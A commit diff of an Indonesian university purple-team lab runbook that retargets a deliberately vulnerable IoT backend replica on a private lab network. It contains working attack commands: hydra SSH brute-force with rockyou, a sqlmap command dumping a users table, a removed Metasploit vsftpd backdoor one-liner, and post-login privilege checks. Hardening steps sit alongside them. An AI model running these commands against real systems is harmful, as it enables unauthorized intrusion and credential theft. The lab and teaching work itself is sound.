<commit_message>
docs: switch target node to Ubuntu Server, align week-9 artifacts
- docs/design/replica_setup.md: cara bangun replika backend IoT yang sengaja rentan
- docs/design/topology-v2.png + ip_plan revisi: target Ubuntu Server 26.04, segmen Internal Network pbl-kel4
- tech_stack_declaration: pemetaan 1:1 (nginx, MariaDB, Mosquitto, OpenSSH) + daftar kelemahan disengaja
- hardening_checklist: perintah disesuaikan ke ufw/fail2ban/systemctl/apt
- attack_plan + purple-team-log: RT-02 jadi brute-force SSH + eskalasi (bukan backdoor vsftpd)
- slides.pdf, runbook docx/pdf dibangun ulang; README, logbook, bukti README diselaraskan
</commit_message>
<xml_diff>
--- a/docs/roles/Runbook-PBL-TEK1314-Kelompok4-Fase1-3.docx
+++ b/docs/roles/Runbook-PBL-TEK1314-Kelompok4-Fase1-3.docx
@@ -262,7 +262,7 @@
               <w:rPr>
                 <w:sz w:val="17"/>
               </w:rPr>
-              <w:t>192.168.4.5 — Metasploitable2</w:t>
+              <w:t>192.168.4.5 — Ubuntu Server LTS 26.04</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1169,7 +1169,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Instalasi CyberOps Workstation &amp; Security Onion</w:t>
+              <w:t>Instalasi CyberOps Workstation &amp; Security Onion (CyberOps = alat praktikum, bukan node topologi)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2841,7 +2841,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Instal CyberOps Workstation (OVA) dan Security Onion (ISO 3.2.0) di laptop masing-masing / laptop utama.</w:t>
+              <w:t>Instal CyberOps Workstation (OVA) dan Security Onion (ISO 3.2.0). CyberOps hanya untuk praktikum Linux Minggu 3 — tidak dipakai di topologi PBL.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3336,7 +3336,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Petakan versi service ke CVE publik (vsftpd 2.3.4, MySQL 5.0.51a, Samba 3.0.20, Apache 2.2.8).</w:t>
+              <w:t>Petakan layanan replika ke kelemahan yang disengaja (kredensial lemah, SQLi api.php, MQTT anonymous).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3354,7 +3354,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Tabel service → CVE → dampak</w:t>
+              <w:t>Tabel layanan → kelemahan → skenario</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4365,7 +4365,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Pastikan target &amp; sensor hidup, IP sesuai ip_plan.</w:t>
+              <w:t>Pastikan NIC sudah di Internal Network pbl-kel4 dan IP guest sesuai ip_plan.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4383,7 +4383,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>ping 192.168.4.5 dari Kali &amp; Onion</w:t>
+              <w:t>ip -brief a di tiap VM; ping 192.168.4.5 dari Kali dan dari Onion; nmap -sn 192.168.4.0/24</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4401,7 +4401,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>screenshot ping</w:t>
+              <w:t>screenshot ip a + ping</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4607,7 +4607,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>ssh-copy-id -i ~/.ssh/pbl_kel4.pub msfadmin@192.168.4.5 lalu login pakai -i</w:t>
+              <w:t>ssh-copy-id -i ~/.ssh/pbl_kel4.pub iotadmin@192.168.4.5 lalu login pakai -i</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5040,7 +5040,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>B-3: patch paket + ganti password root MySQL; JANGAN lupa update config DVWA.</w:t>
+              <w:t>B-3: patch paket + hapus kredensial lemah/default.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5057,7 +5057,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>mysqladmin -u root password; edit config/config.inc.php DVWA</w:t>
+              <w:t>apt upgrade; mysql_secure_installation; passwd iotadmin; apt list --upgradable</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5074,7 +5074,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>B3_after_mysql_access_denied.png + dashboard masih hidup</w:t>
+              <w:t>B3_after_apt_upgraded.txt + B3_after_mysql_secure.png</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5259,7 +5259,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>Pitfall yang paling sering menghabiskan waktu: (1) Metasploitable2 memakai Ubuntu 8.04 yang repositori apt-nya sudah EOL — "apt-get install ufw/fail2ban" bisa gagal. Bila gagal, ganti dengan iptables (default-deny + rate-limit) dan tulis jujur di checklist bahwa kontrolnya diimplementasikan dengan iptables, bukan ufw/fail2ban. (2) Mengganti password root MySQL tanpa memperbarui config DVWA akan mematikan dashboard — dan itu merusak skenario RT-03.</w:t>
+              <w:t>Pitfall yang paling sering menghabiskan waktu: (1) VM target saat ini berisi Ubuntu 25.04 yang sudah EOL — pasang ulang ke 26.04 LTS dulu, kalau tidak "apt upgrade" untuk B-3 akan gagal. (2) Jangan aktifkan ufw sebelum port SSH 2222 diizinkan, dan jangan matikan password auth sebelum login pakai key terbukti berhasil — dua hal ini yang paling sering membuat kelompok terkunci dari VM sendiri. (3) Saat mengaktifkan ACL Mosquitto, uji ulang dashboard: user yang salah di ACL akan mematikan dashboard dan menghapus sasaran RT-03.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5280,7 +5280,7 @@
           <w:i w:val="0"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>Contoh pengganti ufw/fail2ban bila apt EOL (jalankan sebagai root):</w:t>
+        <w:t>Contoh aturan iptables bila ufw tidak tersedia (opsional, jarang perlu di Ubuntu):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5768,7 +5768,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Mis. RT-02 → matikan FTP (B-1) + blokir 21 (B-2) + upgrade vsftpd (B-3)</w:t>
+              <w:t>Mis. RT-02 → A-2 key-only + A-4 fail2ban + B-3 password kuat + A-1 no-root</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6597,7 +6597,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>RT-02 eksploit vsftpd 2.3.4 (CVE-2011-2523).</w:t>
+              <w:t>RT-02 brute-force SSH (kredensial lemah, kelemahan disengaja #1).</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6615,7 +6615,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.4.5; run"</w:t>
+              <w:t>hydra -l iotadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.4.5 -t 4 -f -V</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6633,7 +6633,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>rt02_msf_console.txt + id = uid=0</w:t>
+              <w:t>rt02_hydra_baseline.txt</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6672,7 +6672,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>RT-02 fallback bila backdoor sudah ditutup: default credential.</w:t>
+              <w:t>RT-02 ukur dampak setelah berhasil login.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6689,7 +6689,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>hydra -l msfadmin -P rockyou.txt ssh://192.168.4.5 -s 2222 -t 4 -f</w:t>
+              <w:t>ssh iotadmin@192.168.4.5; id; sudo -l; mysql -u iotadmin -p iot_db</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6706,7 +6706,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>rt02_hydra.txt</w:t>
+              <w:t>rt02_dampak.txt (sudo -l penuh)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6839,7 +6839,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>sqlmap -u "http://192.168.4.5/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=...; security=low" --batch --dbs --dump -T users</w:t>
+              <w:t>sqlmap -u "http://192.168.4.5/iot-dashboard/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=...; security=low" --batch --dbs --dump -T users</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9875,7 +9875,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>docs/design/topology.png, ip_plan.md</w:t>
+              <w:t>docs/design/topology-v2.png, ip_plan.md</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9909,7 +9909,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Minggu 4 (selesai)</w:t>
+              <w:t>Minggu 4 + revisi Minggu 9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10774,7 +10774,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Repositori apt Metasploitable2 (Ubuntu 8.04) sudah EOL</w:t>
+              <w:t>VM target masih Ubuntu 25.04 (EOL)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10792,7 +10792,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>ufw/fail2ban/mosquitto gagal dipasang</w:t>
+              <w:t>apt upgrade gagal → kontrol B-3 tidak terbukti</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -10810,7 +10810,7 @@
               <w:rPr>
                 <w:sz w:val="16"/>
               </w:rPr>
-              <w:t>Pakai iptables + rate-limit; dokumentasikan penggantian kontrol secara jujur</w:t>
+              <w:t>Pasang ulang ke 26.04 LTS sebelum sesi S1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11426,7 +11426,7 @@
           <w:b w:val="0"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>→ kaitkan ke celah nyata hasil riset Minggu 4 (vsftpd 2.3.4, MySQL root kosong, DVWA SQLi) dan ke dampak bisnis.</w:t>
+        <w:t>→ kaitkan ke kelemahan yang sengaja dipasang (kredensial lemah iotadmin, SQLi api.php, MQTT anonymous) dan ke dampak bisnis.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11495,7 +11495,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>ssh -i ~/.ssh/pbl_kel4 -p 2222 msfadmin@192.168.4.5      # login setelah hardening</w:t>
+        <w:t>ssh -i ~/.ssh/pbl_kel4 -p 2222 iotadmin@192.168.4.5      # login setelah hardening</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11594,7 +11594,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOSTS 192.168.4.5; run"</w:t>
+        <w:t>hydra -l iotadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.4.5 -t 4 -f</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11607,7 +11607,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>sqlmap -u "http://192.168.4.5/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
+        <w:t>sqlmap -u "http://192.168.4.5/iot-dashboard/vulnerabilities/sqli/?id=1&amp;Submit=Submit" \</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11633,7 +11633,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="16"/>
         </w:rPr>
-        <w:t>hydra -l msfadmin -P rockyou.txt ssh://192.168.4.5 -s 2222 -t 4 -f</w:t>
+        <w:t>hydra -l iotadmin -P rockyou.txt ssh://192.168.4.5 -s 2222 -t 4 -f</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>